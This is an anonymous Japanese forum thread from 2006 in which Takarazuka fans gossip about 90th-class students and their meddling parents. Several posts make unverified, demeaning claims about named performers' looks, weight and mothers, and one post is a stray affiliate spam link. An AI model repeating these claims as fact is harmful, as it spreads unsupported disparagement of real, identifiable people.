155 :名無しさん@花束いっぱい。:2006/12/10(日) 22:32:50 ID:+iLuteVr
月組男役って、ダンス場面、響、宇月、瑞羽の面子だよね。
瑞羽さんより成績上な彩星さんは?

156 :名無しさん@花束いっぱい。:2006/12/10(日) 23:15:22 ID:ITLccYME
まっつンにお付きできたと聞いたよ。おめでとう

157 :名無しさん@花束いっぱい。:2006/12/11(月) 08:01:20 ID:YDEUci2f
宙、今日の前楽、明日の千秋楽の情報待ってまーす!!

158 :名無しさん@花束いっぱい。:2006/12/12(火) 19:57:14 ID:sB48wZ70
まっつんはまだお付きいないよ。

159 :名無しさん@花束いっぱい。:2006/12/12(火) 20:47:00 ID:Xb7WwFT/
>156 何で海桐さんてすぐこれ系話なの?同じ人が何回もレスしてるの?

160 :名無しさん@花束いっぱい。:2006/12/12(火) 22:02:01 ID:w+DUTdQO
キモイから無視しろ。
スルーが一番。早くここ埋めたら?

161 :名無しさん@花束いっぱい。:2006/12/13(水) 00:09:32 ID:4lKO8G97
まりもさんの服センスどや?

162 :名無しさん@花束いっぱい。:2006/12/13(水) 17:58:23 ID:DrpQQXkx
マッツンカズノコ

163 :名無しさん@花束いっぱい。:2006/12/13(水) 18:31:47 ID:sjuN6nEF
ゆゆのとこお茶飲み会場も決まってなくて大丈夫?
おつき素人でバカなんでしょ?それとも名前だけ借りて、ママがやってるの?

164 :名無しさん@花束いっぱい。:2006/12/13(水) 21:21:33 ID:qtAJTuZz
ゆゆふぁん

165 :名無しさん@花束いっぱい。:2006/12/14(木) 01:56:24 ID:nQnI/KWl
何でまだ決まってないと心配か?
この時期決まってないなんて、割とあるパターン

166 :名無しさん@花束いっぱい。:2006/12/14(木) 08:24:41 ID:+XO+ezTc
煽りですよ。

167 :名無しさん@花束いっぱい。:2006/12/14(木) 21:01:00 ID:1PRwkHyD
るなちゃんはどこでお茶されてますか?

168 :名無しさん@花束いっぱい。:2006/12/14(木) 21:47:40 ID:MBUQuQWk
ひっさびさに出た、アンチ!!w
ファンなら案内来るはずだもんね。
ゆゆアンチも冴月アンチもスルースルー。

169 :名無しさん@花束いっぱい。:2006/12/14(木) 23:15:21 ID:BHXEbvlU
何だこのスレまだやってたの!?
海桐ス○ーカーふぁんとゆゆふぁん(アンチ?)と冴月アンチと
たまに愛原アンチと蒼乃アンチ(ファン?)しか来ないんだから、早く埋めろよ!

ume−

170 :名無しさん@花束いっぱい。:2006/12/14(木) 23:16:59 ID:BHXEbvlU
ume ume−

171 :名無しさん@花束いっぱい。:2006/12/14(木) 23:54:48 ID:BHXEbvlU
ume−

172 :名無しさん@花束いっぱい。:2006/12/15(金) 13:50:02 ID:8noQPiEg
りおんさんは来年成人式だねっ

173 :名無しさん@花束いっぱい。:2006/12/15(金) 17:34:45 ID:5FQit7Mg
また痛いいつもの海桐ファソ?

174 :名無しさん@花束いっぱい。:2006/12/15(金) 23:13:24 ID:5FQit7Mg
埋め参加。

175 :名無しさん@花束いっぱい。:2006/12/16(土) 08:31:15 ID:b+vGPSrD
はいはい

176 :名無しさん@花束いっぱい。:2006/12/16(土) 18:25:20 ID:qK+Nl52K
天風さんのお母さんって
しゃしゃりの親の典型パターンだね。
どあつかましい。
あんなんじゃあ、娘がいくら頑張っていても、親が娘の行く道を塞ぐだろうし、足を引っ張るよ。
お母さんが天風さんの足手まといにならなきゃいいね。
同期の悪口吹聴しているし。

177 :名無しさん@花束いっぱい。:2006/12/16(土) 18:50:54 ID:ZlpAoh2e
>176
でた THE逆恨み・・・と思ってしまうw

176がアブナイ奴で「うちの娘に近づかないで」と注意されたん?
・・・とよんでしまうパターン


178 :名無しさん@花束いっぱい。:2006/12/16(土) 20:03:03 ID:qK+Nl52K
いやいや違いますよ。
天風さんのお母さん、けっこう色々なとこでやらかしてるし↓かなり、どあつかましいって話ですわ。
あちこちで同期の生徒さん+親の悪口言い過ぎだしね。
こんなんで良いのかなぁ?あかんやろと危惧してるんです。
狭い世界なのにって。

179 :名無しさん@花束いっぱい。:2006/12/16(土) 20:22:42 ID:kSvLhVus
同期の親かMる?w

そんな親いっぱいいますよ。彩城レアのママだって客席に挨拶回りしたりすごいらしいよ。
もう次研4なのに親が出て来て仕切ったりなんて、生徒も恥ずかしくないのかな。
どっちにしても天風さんも彩城さんもぶさ・・・だし、たいした事ないのにね。
そういう所に限って出て来るのかしら・・・。

180 :名無しさん@花束いっぱい。:2006/12/16(土) 20:38:19 ID:j9B3zXwy
仮に、親がしゃしゃり出なかったところで路線に乗ると思う?
天風と彩城が?


181 :名無しさん@花束いっぱい。:2006/12/16(土) 21:00:00 ID:kSvLhVus
彩城さんは本公演でも順調に役付いて来てるけどね。成績いいから。
路線と言われれば「違う」って言う人が多いのでは。組スレでも評判良くなかった記憶が・・・。
いくら親が出て来てもファンいなかったらしようがないw

182 :名無しさん@花束いっぱい。:2006/12/16(土) 21:19:36 ID:QPC+gxkf
同期の悪口って誰が悪口言われてるの?うちの贔屓の悪口言われてるんじゃないか心配

183 :名無しさん@花束いっぱい。:2006/12/16(土) 21:41:45 ID:kSvLhVus
上がって来そうな子とか、特に自分の子供の邪魔になるような子でしょ。
ファン多くて嫉妬で悪口とかもありそうw
生徒も親に限らず悪口言う人って見境いなく誰の事でも言いそう・・・。

184 :名無しさん@花束いっぱい。:2006/12/16(土) 21:43:21 ID:kSvLhVus
「生徒も」じゃなくて「生徒の」でした。

185 :名無しさん@花束いっぱい。:2006/12/16(土) 22:08:00 ID:evfoph7C
>183ファソ多い同期なんていないけどw
ファソいない90期の中じゃ、まだ人気あるってならいるかもだけど。
天風さんの宙なんか、ファソなんかみた事ないよw嫉妬なんかしようがないんジャネ?

186 :名無しさん@花束いっぱい。:2006/12/16(土) 23:07:42 ID:ttRAAqCu
天風さんとこは上級生とか下級生のあがってきてる子の話をするって聞いたことがある。

187 :名無しさん@花束いっぱい。:2006/12/17(日) 00:00:41 ID:hFIJQpJX
彩羽さんや天羽さん、いっちゃんはファンいるんじゃないの?

188 :名無しさん@花束いっぱい。:2006/12/17(日) 08:09:47 ID:09A9Sikr
>>187天羽???風羽かな?サッツンとチャミは辛うじているみたいだけど。イッチャンは見たことないなあ。
あとコーマイもファン見たよ。

189 :名無しさん@花束いっぱい。:2006/12/17(日) 11:00:41 ID:hFIJQpJX
風羽さんです、間違った。
彩羽さんと風羽さんはお付きいるんじゃないの?いっちゃんも。
お茶のみぐらいしてるんじゃないの?

190 :名無しさん@花束いっぱい。:2006/12/17(日) 18:04:00 ID:vNfpyXtP
いくら他の同期陥れようと悪口いっても、
こんなとこで晒されたら、そんな事する親なの?って
自分のとこの印象がた落ちだね。作戦失敗どころか逆効果。


191 :名無しさん@花束いっぱい。:2006/12/17(日) 19:37:39 ID:+w23KzTx
そうだよね。
雪の男役母と星男役母もあんな目立つ所で内部情報話さないほうがいいよ。
バレて怒られるのは娘だからさ

192 :名無しさん@花束いっぱい。:2006/12/17(日) 20:15:05 ID:hFIJQpJX
ライバルだから少しでも蹴落としたいんだろうね。
そんな事よりファン増やす方法考えればいいのに、90期は親も程度が低いね。
賢い子はどんどんお茶のみもやってるよねw
親はファン増やせないよ。
どうせここも見てチェックしてんでしょ?w>90期ママ。

193 :名無しさん@花束いっぱい。:2006/12/17(日) 21:08:04 ID:WY+w3Hpb
>192
ここだけじゃなく別館もチェックしてそう。

194 :名無しさん@花束いっぱい。:2006/12/17(日) 22:11:06 ID:vNfpyXtP
人当たりがいい。が何より上に行く秘訣だよね。
普通に考えて、同期の悪口ばかり話す様な
人間がなってない親の娘なんか応援したくないw

195 :名無しさん@花束いっぱい。:2006/12/17(日) 23:27:18 ID:wLEry/0A
つーか親が出てきちゃイカン。ここでもずーっと言われてたのに、
なんでこんな学年になってまで90期は親が人目に付く所に出て来るのか!?

>>192の読んで焦ってそうだよねw 早速お茶飲みやったりしてww
親がバカな所って大変そう。それより組の入り・出待ちルールなんかをちゃんと守れって。
ちゃんと目を付けられて、お子さんが評判悪くなってるだけなのにw
空気も読めない親はダメ! ってか親が出る幕じゃないけど。

196 :名無しさん@花束いっぱい。:2006/12/18(月) 00:59:12 ID:8Var6K8f
まぁ親がしっかり仕切りができる生徒さんが、上に上がっていけるから、一概に親が出てきちゃいけないとは言わないけど、目立たずに動けって話なんだよね。


197 :名無しさん@花束いっぱい。:2006/12/18(月) 01:27:05 ID:CL052GEq
>親がしっかり仕切りができる生徒さんが、上に上がっていけるから

そんな事は絶対にないww “お付きがしっかりしてる”なら分かるけど。
初心者ちゃんなのかな?sage覚えてね。
かなりの上級生会でも、親が仕切ってる所にロクな所はない。
生徒をつぶすだけ。

それより親が出て来てる90期は、お付きがいないから親がやってるのか、親がやりたがりだからお付きを付けない(が付かないw)のかどっちだろう?w

198 :名無しさん@花束いっぱい。:2006/12/18(月) 08:39:44 ID:mG+hPyUn
>>192賢い生徒がどんどんお茶のみしてるって?それはないっしょ。
親が仕切ってどんどんお茶のみやってるとこ結構あるし。お付きがいてもやらない生徒もいる。
ファン増えるのは舞台で努力してる生徒。それで出待ちして親がべったり付いてると離れてくんじゃない?
現実に連絡とれるお付きがいる生徒はファン増えてるしね。
雪星もだけど宙の親も悲惨だよ。ファンと娘の取り合いw
親が片っ端からファンきってるし。

199 :名無しさん@花束いっぱい。:2006/12/18(月) 08:59:53 ID:Sx2b35/R
花もそうらしい。

200 :名無しさん@花束いっぱい。:2006/12/18(月) 12:24:45 ID:eu4ycuu2
親が仕切ってお茶飲み・・・なんて宝塚でありえないから!w

201 :名無しさん@花束いっぱい。:2006/12/18(月) 13:09:59 ID:mG+hPyUn
他の世界ではありえないけど、実際あるのがタカラヅカ
張り切ってやってる親いるよwみっともないったらありゃしない

202 :名無しさん@花束いっぱい。:2006/12/18(月) 13:16:52 ID:eu4ycuu2
ありえないって。90期の馬鹿ママだけじゃないの?
誰が司会するのさw

203 :名無しさん@花束いっぱい。:2006/12/18(月) 13:25:24 ID:mG+hPyUn
司会なんて知人とかに頼んでやってもらってるし。司会と仕切りは別だからさ。
つーか90期の親だけでないよ。89期にもゴロゴロいるよ。

204 :名無しさん@花束いっぱい。:2006/12/18(月) 13:31:23 ID:eu4ycuu2
90期でもちゃんとお茶飲みお付きがやってる所もあるよ。
純粋にファンだけのね。
無理矢理知り合いで埋められるお茶飲みされても生徒も惨めなだけじゃんw
ファンもしらけて去って行く罠。そこまで親がやる必要ない。

205 :名無しさん@花束いっぱい。:2006/12/18(月) 13:59:17 ID:fqYVLE5m
知り合いばっかのお茶に行ってもファンは居心地悪いしね

206 :名無しさん@花束いっぱい。:2006/12/18(月) 16:41:47 ID:Mm9qatys
多少は親もこれ見て反省するかな?

207 :名無しさん@花束いっぱい。:2006/12/18(月) 19:07:03 ID:mG+hPyUn
>>204本来お茶のみってそれが普通なんだよね。
会場には入らなくても、案内リストから会場から内容から、
全部親が決定権握って采配してる生徒いるからね。
「わたしが〇□チャン守らなきゃ」ってさ、守るより見守らないと。
娘がジェンヌなら自分もジェンヌと勘違いするバカ親ばっかw
90期に限らずお付きに任せてるとこは、生徒とお付きもうまくいってるよね。

208 :名無しさん@花束いっぱい。:2006/12/18(月) 20:59:21 ID:hAFFuggi
ゆゆちゃんとこもすごいしね。

209 :名無しさん@花束いっぱい。:2006/12/18(月) 21:10:00 ID:SgW1YLQT
親が出てくるのは最悪だけど、独占主義のお付きもこまりもんだかんな〜
スクールの時の友達は、おばさまに紹介してもらったお付きなのに、
ファンの悪口ばかり聞かされるらしくてうんざりしてる。
「独占欲強い人ほどファンの事悪く言うんだよ。早めに切ったら?」と言ったけどおば様絡みなのでなかなか言えず悩んでる。

210 :名無しさん@花束いっぱい。:2006/12/18(月) 21:17:50 ID:CL052GEq
>>195 >それより組の入り・出待ちルールなんかをちゃんと守れって。

本当にそう。宝塚のルールも知らないなら、親がめちゃくちゃせずに、
ちゃんとしたお付きを付けろってね。
ちゃんとルール守ってやってる所も一緒にされて迷惑だし可哀想だよね。

>>179 彩城ママ、客席に挨拶まわりって・・・主役の親でもあるまいし?w
>>208 ゆゆもお付きとは名ばかりで、やっぱり親が仕切ってるの?

211 :名無しさん@花束いっぱい。:2006/12/18(月) 21:32:08 ID:hAFFuggi
どこも同じかも知れないけど、ゆゆちゃんとこはステージママで有名じゃん。

212 :名無しさん@花束いっぱい。:2006/12/18(月) 22:00:18 ID:8Var6K8f
あと宙娘の花音舞のママもね↓
あそこのママもすごい。
ヤル気満々だから。
花音ちゃんとこは、ママもだけど娘も慇懃無礼って言葉がピッタリの母娘だよW
高飛車なのは良いけど、花音ちゃんダイエット頑張って〜。
ちと見苦しい。
お金持ちだって誇示するなら、娘をエステ通わせるなり、整体通わせるなり、痩せさせなきゃ〜


213 :名無しさん@花束いっぱい。:2006/12/18(月) 23:16:14 ID:N8Ioku0u
まりもファン層どんなですか?

214 :名無しさん@花束いっぱい。:2006/12/18(月) 23:24:12 ID:CL052GEq
>>213 また出た、海桐ス○ーカー、蒼乃掛け持ちファン!
流れや空気読んだら? ここで相手されてないって気づいてよ。

215 :名無しさん@花束いっぱい。:2006/12/18(月) 23:30:51 ID:XswZpH2w
花音の親は実際やばい。
大分早い時期から娘役なのに、お茶飲み会やってる同期男役を見て
うちもやりたいわぁ〜って真剣に言ってたって。
来る人居るのかいな?身内の親睦会?

216 :名無しさん@花束いっぱい。:2006/12/18(月) 23:37:48 ID:W4qGrXzp
>209
仕事と割り切って付いてる人以外は基本的にファンだもん。自分が1番近い人になりたければファンの悪口も言うよね。

217 :名無しさん@花束いっぱい。:2006/12/19(火) 14:11:05 ID:9G2pgf4E
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

218 :名無しさん@花束いっぱい。:2006/12/19(火) 22:44:19 ID:19CIZM2H
花音ママはゆゆママに負けず劣らずだよw娘の足引っ張ってるの全然わかっちゃない
宙星は数人除いて母親の無法地帯だし
娘の荷物持ち、花出しに命懸け!!いつまでやるつもりなんだろ??

219 :名無しさん@花束いっぱい。:2006/12/19(火) 23:38:26 ID:JyaGwWU+
ゆゆママ、そんなにひどいんだ。


220 :名無しさん@花束いっぱい。:2006/12/20(水) 01:24:28 ID:ZKG/uC9k
>娘の荷物持ち、花出しに命懸け!!いつまでやるつもりなんだろ??

宙星ってそんなにひどいんだ・・・
星男で生徒の名前で、劇団あてにはがきで取り次ぎやってるところは知ってるけど
たぶんママがやってるんだろうなー。友達のところにはがきが来て、見せてもらったけど
内容がひどすぎた。何にも知らなさそうな感じで、言葉遣いも変なところだらけだったし・・・
「ご覧になりたい方は」だって(呆)高飛車で引いたw

でも次研4なんだから、花出しや荷物持ちに親が出て来たらだめだよね、本当みっともない

221 :名無しさん@花束いっぱい。:2006/12/20(水) 12:43:15 ID:Wwh/RjXu
生徒席取ってあげてるんだから
感謝しろって事ね。

222 :名無しさん@花束いっぱい。:2006/12/20(水) 14:37:24 ID:jXJDggSA
>>220誰?彩羽さんも自分でみたいだけど、お付きってやめたの?ママがきったって彩羽さん?
だったらガッカリだわ。ママの言いなりって。しかも男役なのに。
まともな親いないのかな。

223 :名無しさん@花束いっぱい。:2006/12/20(水) 16:26:01 ID:LmXvZ+Bh
>>220さんの話の星男も、すごいね。
ゆゆちゃんのところは、お付が付く前のチケット取次ぎのとき、チケットに関しては質問しても返事があるけど、入り出に関しては質問しても返事がなかったらしい。

224 :名無しさん@花束いっぱい。:2006/12/20(水) 17:18:05 ID:2D//zeGV
どんな親がファンにとっては理想なの?

225 :名無しさん@花束いっぱい。:2006/12/20(水) 20:18:18 ID:aXBlCRdz
出すぎない親じゃないかなぁ?
何でもしゃしゃって、自分がファンみたいな親はダメだよ。
でしゃばるのもだし、何でもしてもらって当たり前とか思ってるのもね。
知人のおばさま(旦那さまが政財界の有力者)が、ある生徒さんの後ろ楯になりかけてたけど、あまりの親のあつかましさに、嫌気がさしたらしく、手を引いちゃったってのは聞いた。
付き合いに線を引くって。
あのおばさま+旦那さまが付いたら、けっこう大きなスポンサーだし、コネができて安泰だったのに。
生徒さんにとったら、逃がした魚は大きい。
親がいけてない良い例だよ。

226 :名無しさん@花束いっぱい。:2006/12/20(水) 23:39:40 ID:AIIltvIx
>>224は確実に親だよねw
いいお付きを見つけて親は出て来ない事。
お付きや応援してくれてるファンに感謝の気持ちを少しでも持つ事。
生徒の宝塚での今後を考えたら自然と分かると思うけど…。
とにかく心配でも直接出て来たらダメ。

227 :名無しさん@花束いっぱい。:2006/12/20(水) 23:46:28 ID:jXJDggSA
うん、私も親と思ったw
追加すると、チヤホヤされ天狗になり兼ねない娘を、時にはちゃんとたしなめる。
手だし口だしはしちゃダメだが、必要な協力は影でしてあげよう!!

228 :名無しさん@花束いっぱい。:2006/12/21(木) 01:19:30 ID:uzc53dii
知ってる90期の生徒さんは、売れてもいないのにビミョー礼儀ありそうでわきまえてないし、何でもしてもらって当たり前って思ってるみたい。
とがめて諫めなきゃいけないはずの親も、してもらって当たり前って思ってるみたいだから、たちが悪い。
そういうのを見ていると、この生徒さんは伸びないなぁ〜と。
なんせ、世間一般の常識は宝塚では非常識で、世間一般の非常識が宝塚では常識とかって言い放ったらしいから。ここのバカ親。
親がそんな気持ちじゃダメだよ。


229 :名無しさん@花束いっぱい。:2006/12/21(木) 02:24:18 ID:7rkJN7Jc
>>224は私も親だと思うけど、知ろうと耳を傾けてる辺り、前向きでイイ。
娘さんの為に、いい親になってあげて下さい。

昔からこの世界では、いい親やいいオバ様は「金出して口出さず」って言うからね。
本当に必要な援助はしてあげるといいと思う。
まぁ簡単にお付きや代表引き受けてくれる人がいなくてどこも困ってる時代だからね。
お金出してやってくれる人もいない時代だから。応援してくれてる人は大事にね。
離れてからじゃ遅い。何百人もジェンヌはいるからね。
チケットは「取ってあげてる」んじゃなくて、「見てもらってる」んだよ、特にムラは。

230 :名無しさん@花束いっぱい。:2006/12/21(木) 02:47:21 ID:swpvg4ab
そんなにつべこべ親のこというくらいならファンになんてならなかったらいい。ファンやお付きがついたからって他人。たいした人も居ないだろうし。

231 :名無しさん@花束いっぱい。:2006/12/21(木) 03:45:05 ID:CPW2OekU
煽ってるつもり?w

232 :名無しさん@花束いっぱい。:2006/12/21(木) 12:16:06 ID:swpvg4ab
ファンって偉くですぎだよね。馬鹿みたい。感謝しろとかありがたく思えとか生徒も迷惑よね。

233 :名無しさん@花束いっぱい。:2006/12/21(木) 12:23:49 ID:uzc53dii
っていうか、売れてもいないのに天狗になってる生徒や親の方が問題なんじゃないかなぁ?と。


234 :名無しさん@花束いっぱい。:2006/12/21(木) 12:25:57 ID:7xTHMVu1
最初は親も心配だろうけど、新公過ぎても、親が前面に出てくるのは
やはりマイナス。独り立ちできていない印象を持たれるし、甘い。
親は、過度に期待しないで見守るのが一番。

235 :名無しさん@花束いっぱい。:2006/12/21(木) 13:31:33 ID:luzLEOFr
そうだよね。
やりすぎ感はあるよね。
別館の削除以来だしてるの見てちょっとひいた。
たぶん親だなーって思った。


236 :名無しさん@花束いっぱい。:2006/12/21(木) 13:53:46 ID:5RNBCBQF
>>230,>>232 娘さんの芸名は?男役ですか、娘役ですか?何組ですか?w
そんなこと言ってるうちに、今にろくにファンも居ないまま寂しく退団ですね。
退団のガード・・皆その娘さんの顔も知らないのに、
頭下げられて嫌々ガード入ってあげるんだろうな。
ファンが居ない=誰も協力しないから、嫌々ガード入ってやってんのに
何で会服代払わなきゃ何ねーんだよ。ってなって、出費かさむよ(笑)

237 :名無しさん@花束いっぱい。:2006/12/21(木) 17:32:17 ID:B0fVWiXX
親が出るなって言っても、90期くらいじゃ親ががんばんないと
生徒席さばけないでしょ〜?
親がさばいた相手は親がその後も連絡することになるわねぇ。
私も親経由で生徒席買ってるよ。他の連絡も親からだよ。
純粋なファンは生徒がやってるんだろうけど。

238 :名無しさん@花束いっぱい。:2006/12/21(木) 20:21:12 ID:7rkJN7Jc
>>237 出しゃばりな親本人登場ですねw
ファンで取れてる所もあるよ。親がやってる所で生徒券取ろうとは思わないでしょ、普通w
お付きがちゃんとやってる所じゃないと私は関わりたくないけどねw

239 :名無しさん@花束いっぱい。:2006/12/21(木) 20:50:15 ID:B0fVWiXX
>>238

親本人ではないけど、地元なんで下級生の親とは何人か関りある。
苦労している公演もあるからさ。
当日、急に親から電話かかって行くこともあるよ。
下級生なんて親が関らないとやっていけない。
親も大変だなぁこそ思うけど、でしゃばりなんて思ったことないよ。


240 :名無しさん@花束いっぱい。:2006/12/21(木) 21:09:07 ID:0G0xKMSo
>>237アナタ親ですねw
誰も親が知人達に生徒席取り次ぐのを非難してないですよ。研3位ならどこの親でもやってるでしょうし。
ここで今論議されてるのは、1番の仕切りを親がするのはどうか、って問題。
沢山の人が(主にファンが)それを嫌がってるんですよ。大事な娘なんだから、そりゃ心配でしょう。知らんぷりしろ、とは言わないです。
しゃしゃり出ても娘の為にプラスになることなんて一つもないです。
まだ研3なんです。切っても切っても湧いてくる程まだファンはいない。
はっきり言って多くのジェンヌの中から娘に興味を持ってくれた希少ファンです。
余程困り者でない限り、応援続けてもらうには、近付けない環境を親が作ってはならないのです。
同期がファンを増やしていく中で、自分の娘にはファンがつかず、いつまでも親が花出しを手伝ってる姿、想像して寂しくないですか?
またママ同士でつるんでる光景は自分達が思ってるよりみっともないですよ。
見守る、という意味を今一度しっかり考え直されてはいかがですか?
同期ママの中でも、それが出来てる方も僅かですが、ちゃんといるのですから。

241 :名無しさん@花束いっぱい。:2006/12/21(木) 22:15:39 ID:7rkJN7Jc
>>240 イイ事言った!

>>239
>下級生なんて親が関らないとやっていけない。

そんな事は絶対にないw そんな連絡もお付きがやるものです、普通w 


242 :名無しさん@花束いっぱい。:2006/12/21(木) 22:31:56 ID:5RNBCBQF
ってか、ファンが居ない娘の親こそ娘娘って頑張ってるみたいだけど・・
ファンが付かないのは自分の頑張りが思いっきり空回りしてるのが原因だって事、
早く気づけよ(笑)
周りがドン引きだよw

243 :名無しさん@花束いっぱい。:2006/12/21(木) 22:46:35 ID:7rkJN7Jc
>>242 そうそう、本当にみっともないよね。

244 :名無しさん@花束いっぱい。:2006/12/21(木) 23:40:05 ID:6As7oy0K
やっぱりここ読んで改めて何にも分かってない親が多いんだな〜と痛感。
知らないなら張り切って出てくるべきじゃない。
黙って早くいいおつき見つけなよ。ルールを良く知ってる人に頼むべき。
ここ読んで、親同志の情報交換なんて間違いだらけだと思うよ〜。

245 :名無しさん@花束いっぱい。:2006/12/22(金) 08:47:19 ID:y1kAjTnq
本人・親にファン時代がなければ、分からないのもしょうがない
確かに、分かってなさすぎの馬鹿親はいる

だが、そこまで偉そうに親を非難するっていうのは
お付きやりたいのにさせてもらえないヒガミを感じる

246 :名無しさん@花束いっぱい。:2006/12/22(金) 12:52:08 ID:TaebCZj8
うちの娘に変なファンが付いて困るのよー。
とか、
チケット取って上げてるんだからもっとお花代だせばいいのに。
とか。

247 :名無しさん@花束いっぱい。:2006/12/22(金) 15:02:13 ID:1gEYcVSz
たいしたチケットも寄越せないなら、つべこべ言うなよってのもあるな。
こっちは顔立てて、チケット頼んだのに、上から目線な態度とられてもねW
実際、親に頼んだのよりも、手配してもらった方が格段にチケット良席だったしW

248 :名無しさん@花束いっぱい。:2006/12/22(金) 16:34:07 ID:k+q4MHSF
生徒やら親にチケを頼むときは良席期待したらあかんがな。
埋めて上げますよ〜ってな気持ちでないとね。
良席よこせっていうのはお門違いでございましょ。

249 :名無しさん@花束いっぱい。:2006/12/22(金) 17:14:00 ID:1gEYcVSz
っていうか、ムチャ偉そうに『任せて』なんて言うからさ〜W


250 :名無しさん@花束いっぱい。:2006/12/22(金) 18:51:15 ID:DbG37hN3
90期もそろそろ研4になるんだから親が表に出てくるのはいい加減にしたら!親の言いなりになる生徒にも難有りだけどね。

251 :名無しさん@花束いっぱい。:2006/12/22(金) 20:56:49 ID:3rCxMS0Z
チケットも親がやってるなんて最悪ですよ。何で親が仕切る??

>245
>本人・親にファン時代がなければ、分からないのもしょうがない

「分からないからしょうがない」と開き直るんじゃなくて、分からないなら経験者のお付きや代表に聞け。
分からない者同志素人感覚で話してるから、悪循環なんじゃないの?
娘の為って本当に思ってるならね。もしかしてこのバカ親達は「ファンなんかつかなくていい」って思ってるんじゃないの??w
聞きかじった間違った知識に頼るのはやめて、本当に入り出のルールなんかを勉強したら?
親は入り出の場所に行かないとか、上級生順に待ってるとかさ。
まあ自分の娘だけお付きや代表もいない惨めな生徒になればいいだけだけどねw

252 :名無しさん@花束いっぱい。:2006/12/22(金) 21:16:26 ID:ORJbSTpC
FA出てる話題をいつまで引っ張るんだ…

みんな、言ってることと行動が違い過ぎるからちょっとモチツケ

253 :名無しさん@花束いっぱい。:2006/12/22(金) 21:24:20 ID:fsV46Jq4
宙のグループ分け出たね。出れないのは天風さんと咲真さんだけ?
花も成績悪い2人(瀬戸さん・夏城さん)は出れなかったもんね。
91.92期もいっぱい出てるのにね…。成績悪いとキツイね。

254 :名無しさん@花束いっぱい。:2006/12/22(金) 21:27:33 ID:fKq01XD6
そんなこと言ったら汐月と花風もだよ。

255 :名無しさん@花束いっぱい。:2006/12/22(金) 22:59:10 ID:q60B2o6M
成績だったら、なんでゆゆちゃんは出れてるんだか不思議だわ。

256 :名無しさん@花束いっぱい。:2006/12/23(土) 03:24:07 ID:85N0+7l0
舞ちゃんはハローダンシングにしか出ないんだね
凛ちゃんとかあきなちゃんとかは、コンサートも出るみたいなのに
舞ちゃんって思ったよりあまり使われてないな

257 :名無しさん@花束いっぱい。:2006/12/23(土) 11:32:23 ID:uZ/xlk4O
90期の親って、言っても分からないバカ親なんだね。
きっとこのままどうしても人が必要!!
って時にだーれもファンや支えてくれる人が居なかったとき、
初めて気づくんだね。
このままいって、将来孤独な辞め方をする娘を考えてみたら?
宝塚っていう華やかな世界に居たのに、退団を惜しんでくれるのは身内だって
可哀想すぎるぞ。

258 :名無しさん@花束いっぱい。:2006/12/23(土) 11:45:19 ID:fgINrqlu
いいんじゃない?
ファンなんていらないって本気で思ってるんじゃない?
ちゃんとやってる所はどんどんファン増えてるし、今親がやってる所は今さら手遅れなんだもんw
白い目で見て、放っておけば?

259 :名無しさん@花束いっぱい。:2006/12/23(土) 18:18:34 ID:0B0+M9++
私のトコは親も動かないしファンも動かないから本人が勝手にやってる。
誰かやってくれ…

260 :名無しさん@花束いっぱい。:2006/12/23(土) 18:38:07 ID:ENl+FVMG
>>256
あきなちゃんはまいちゃんよりは使われている。
やはり身長低くて可愛いからね…。
舞ちゃんも可愛いがやはりあきなちゃんは
低身長という武器?があるからな…。ホピーとかイロイロ
こまごまと使われている。
凛ちゃんはどうなんだろ。成績は良いよね。
でも舞ちゃんもそのうち出てて来るでしょ。
歌が何よりも上手いし。

261 :名無しさん@花束いっぱい。:2006/12/23(土) 20:40:15 ID:EBXgKsW9
天風さんって、歌うまいし、今回の公演で男前になったなぁって思ったんだけど、振り分けでどっちにも名前なくて残念↓
正統派って感じがするんだけど。
大器晩成型なのかなぁ〜
めげないで頑張ってほしい。

262 :名無しさん@花束いっぱい。:2006/12/23(土) 20:53:29 ID:fgINrqlu
>>261も親だったら大笑い!痛すぎる。


263 :名無しさん@花束いっぱい。:2006/12/23(土) 23:47:17 ID:uZ/xlk4O
>>262
親でも笑えるけど、こんな親ネタでいっぱいの中、
親に間違われるような痛いこと書くファンだとしても笑えるよ。

264 :名無しさん@花束いっぱい。:2006/12/24(日) 14:24:06 ID:3Tg/StnV
おやおやまーまー。

265 :名無しさん@花束いっぱい。:2006/12/24(日) 21:54:31 ID:J5prJUon
名前だすとまた荒れるから伏せとくけど、協力するけど口だししないママもいるよ。
お付きに全部任せてるみたいで、お付きもママに感謝してるって聞いた。

266 :名無しさん@花束いっぱい。:2006/12/24(日) 23:11:06 ID:kZ8h9oDd
>>265 だからそういう所もあるって何回も書かれてあるじゃん・・・
ただ少ないだけでしょ。それと親がやってる所が多くてあまりに目立つ行動してるって事でしょ?
もうそろそろ飽きた。

267 :名無しさん@花束いっぱい。:2006/12/25(月) 00:19:36 ID:zFHGB5Wx
>265タン、うちの贔屓んとこもそうだよ。ママとお付きが仲よくて安心できるし。
つーか贔屓が安心して任してんのわかるから、ママも任せられるんだとオモ
ココ見て改心したママも絶対いるよ!!でないと皆で議論した意味ないもん!!
何も感じなかったトコは最後に泣くだけだから、もうほっとこw
そろそろ公演の話題に移ろうよ。宙の公演分け出たね!コーマイ、オメ!良かったね!!

268 :名無しさん@花束いっぱい。:2006/12/25(月) 15:49:19 ID:4R9B+hmT
「議論」してたのかよw
随時レベル低い議論だなおい。

269 :名無しさん@花束いっぱい。:2006/12/25(月) 19:21:45 ID:ITmYeZx5
しかも公演の話って言うから、こんな年末にどこの公演の話するかと思いきや
コウマイの話に切り替えたかっただけかw

270 :名無しさん@花束いっぱい。:2006/12/25(月) 20:01:18 ID:JVPOpxHj
コーマイなんてどうでもいいぞ!顔以外は好きじゃないし。

271 :名無しさん@花束いっぱい。:2006/12/26(火) 14:35:17 ID:C6VB0VuN
こーまい可愛いじゃん。いっちゃんも好き。宙は好きな子多い。みんな頑張ってね!

272 :名無しさん@花束いっぱい。:2006/12/26(火) 16:13:38 ID:CBaTc5F0
顔は綺麗だよね。でも男役にしては背がちょっと低いかな。

273 :sage:2006/12/27(水) 00:32:06 ID:p45ETGBh
悠南さん、どうしちゃたの?
大丈夫なんだろうか・・・



274 :名無しさん@花束いっぱい。:2006/12/27(水) 12:59:43 ID:2OGIO8I2
エリザも休みだったっけ?

275 :名無しさん@花束いっぱい。:2006/12/27(水) 13:06:40 ID:NAKViFRD
コウマイネタならママネタのままでよかったと思う自分。

276 :名無しさん@花束いっぱい。:2006/12/27(水) 17:12:52 ID:E0kmqfg1
悠南さん、私も心配。
